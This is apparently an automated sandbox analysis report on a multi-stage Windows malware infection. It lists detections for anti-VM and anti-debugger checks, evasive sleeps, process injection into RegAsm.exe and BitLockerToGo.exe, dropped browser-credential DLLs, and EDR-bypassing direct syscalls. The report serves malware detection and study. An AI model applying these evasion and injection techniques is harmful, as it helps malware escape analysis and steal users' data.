Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Memory allocated: 30D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory allocated: 770000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory allocated: 22B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory allocated: 21F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory allocated: 2180000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory allocated: 2440000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory allocated: 2180000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory allocated: 15D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory allocated: 33E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory allocated: 31E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory allocated: 12A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory allocated: 2CC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory allocated: 2BC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 1110000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2D50000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2B50000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 25B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2730000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 4730000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 1B60000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 3800000 memory reserve | memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory allocated: 1D90000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 945
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QIRUR.tmp\_isetup\_iscrypt.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NewStar\libeay32.dll (copy) Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NewStar\is-2Q3FJ.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NewStar\is-EAF0N.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\lnef[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NewStar\ssleay32.dll (copy) Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\filename.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\userJJJJDAAECG.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QIRUR.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NewStar\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NewStar\libssl-1_1.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NewStar\is-KRTJG.tmp Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[2].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QIRUR.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\NewStar\is-9IS1N.tmp Jump to dropped file
Found evasive API chain (date check)
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Evasive API call chain: GetSystemTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe API coverage: 3.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\gobEmOm5sr.exe TID: 7504 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe TID: 7520 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7540 Thread sleep count: 51 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660 Thread sleep count: 335 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7660 Thread sleep time: -67000s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe TID: 1860 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe TID: 5344 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe TID: 7520 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe TID: 7684 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe TID: 7256 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 5576 Thread sleep count: 52 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 5576 Thread sleep time: -104052s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 3616 Thread sleep count: 44 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 3616 Thread sleep time: -88044s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 5084 Thread sleep count: 51 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 5084 Thread sleep time: -102051s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 6112 Thread sleep count: 56 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 6112 Thread sleep time: -112056s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 8100 Thread sleep count: 62 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 8100 Thread sleep time: -372000s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 6048 Thread sleep count: 45 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 6048 Thread sleep time: -90045s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 5312 Thread sleep count: 48 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 5312 Thread sleep time: -96048s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 5568 Thread sleep count: 52 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 5568 Thread sleep time: -104052s >= -30000s
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 4828 Thread sleep count: 47 > 30
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe TID: 4828 Thread sleep time: -94047s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4180 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5100 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5100 Thread sleep time: -45000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3060 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5776 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7924 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe TID: 3668 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe TID: 4192 Thread sleep time: -1440000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 1608 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7860 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 7_2_00409B30
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe Thread delayed: delay time: 60000
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: lenTsqDIajevXTuJaJ03oKGb.exe Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: HgFsrsD7Mnq7IVYcDrZ
Source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2196471445.00000000012BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
Source: OvoRF_A3QBH3keQBtcOqN7Fa.exe, 00000010.00000002.2264707504.0000000001DFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: jm8hgFsy2bHi6yaFC847
Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010AA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1950398912.00000000010ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: NhwHwiZLhgFsNg0w3XQu
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2332767463.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: XLPHGFSPQHIXQJMWIYQNEBJBPSRAXIXVQJURCRMXGFAG
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000000.1922131393.0000000000282000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: vMciv4FTWk
Source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000000.1922131393.0000000000282000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: DEURKUJUSGIWVQOPRPWDRMHVYYEHDFBZIPNXTCMQEMUHYDLVICQWEFGRWZTLPCRMFJNFCQWPCFY
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Open window title or class name: regmonclass
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Open window title or class name: ollydbg
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Open window title or class name: filemonclass
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: NTICE
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: SICE
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Process queried: DebugPort
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Process queried: DebugPort
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Process queried: DebugPort
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process queried: DebugPort
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process queried: DebugPort
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00432CB0 mov eax, dword ptr fs:[00000030h] 2_2_00432CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00432CB0 mov eax, dword ptr fs:[00000030h] 2_2_00432CB0
Enables debug privileges
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 17_2_61EAF900
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EAF8FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 17_2_61EAF8FC
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 7wpHB_IZvVwIDf0EgO_TfPH6.exe PID: 8048, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: QUh1lM2wAJwuyCkYckhrDFwz.exe PID: 8056, type: MEMORYSTR
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JJdIaooFQpkpcWNUCJ71mJDj.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Documents\iofolko5\QUh1lM2wAJwuyCkYckhrDFwz.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Documents\iofolko5\2Umx78uafM0WA03fzJyYYhBa.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Documents\iofolko5\1YtOZF0EeqgcR_ddwAXkTcuY.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\Documents\iofolko5\OvoRF_A3QBH3keQBtcOqN7Fa.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Contains functionality to inject code into remote processes
Source: C:\Users\user\Documents\iofolko5\7wpHB_IZvVwIDf0EgO_TfPH6.exe Code function: 11_2_022B52C1 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 11_2_022B52C1
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Documents\iofolko5\wvASxpczH5zLyfxXnILhiH8_.exe NtProtectVirtualMemory: Direct from: 0x14184DA5A Jump to behavior
